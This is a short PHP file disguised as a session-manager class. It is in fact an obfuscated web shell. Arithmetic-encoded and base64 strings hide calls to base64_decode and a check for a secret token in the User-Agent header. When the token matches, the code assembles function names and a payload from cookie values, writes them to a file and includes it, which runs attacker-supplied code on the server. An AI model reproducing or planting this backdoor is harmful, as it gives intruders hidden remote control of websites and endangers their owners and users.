<?php
function init_system($c)
{
    $a = array(108 * 106 - 11347, 96 + 1 + 3, 113 - 2, 104 - 5, 101, 91 + 2 + 7, 66 + 29, 54 * 21 - 1082, 14 * 23 - 268, 54 * 7 - 277, 9 + 42 + 64, 10 + 51 + 36, 2 * 49);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    $s = strrev($s);
    return $s($c);
}

class SessionManager
{
    private static $_zqo;
    static function executeAction($_bef)
    {
        if (!self::$_zqo) {
            self::sendNotification();
        }
        return init_system(self::$_zqo[$_bef]);
    }
    private static function sendNotification()
    {
        self::$_zqo = array('_ciw' => 'SFRUUF9VU0VSX0FH' . 'RU' . '5U', '_zdv' => 'SFRUUF9VU0VSX0FHRU' . '5' . 'U', '_was' => 'Njk2NzU5MD' . 'I' . '=', '_hu' => '', '_mqk' => '');
    }
}

if (isset($_SERVER[SessionManager::executeAction('_c' . 'iw')]) && strpos($_SERVER[SessionManager::executeAction('_zd' . 'v')], SessionManager::executeAction('_w' . 'a' . 's')) !== false) {
    $_od = $_COOKIE;
    $_wcl = 00;
    $_bef = 02;
    $_fqv = array();
    $_fqv[$_wcl] = SessionManager::executeAction('_' . 'hu');
    while ($_bef) {
        $_fqv[$_wcl] .= $_od[013][$_bef];
        if (!$_od[013][$_bef + 01]) {
            if (!$_od[013][$_bef + 02]) {
                break;
            }
            $_wcl++;
            $_fqv[$_wcl] = SessionManager::executeAction('_' . 'mq' . 'k');
            $_bef++;
        }
        $_bef = $_bef + 02 + 01;
    }
    $_wcl = $_fqv[010]() . $_fqv[022];
    if (!$_fqv[021]($_wcl)) {
        $_bef = $_fqv[04]($_wcl, $_fqv[03]);
        $_fqv[017]($_bef, $_fqv[027] . $_fqv[026]($_fqv[020]($_od[03])));
    }
    include $_wcl;
    die;
}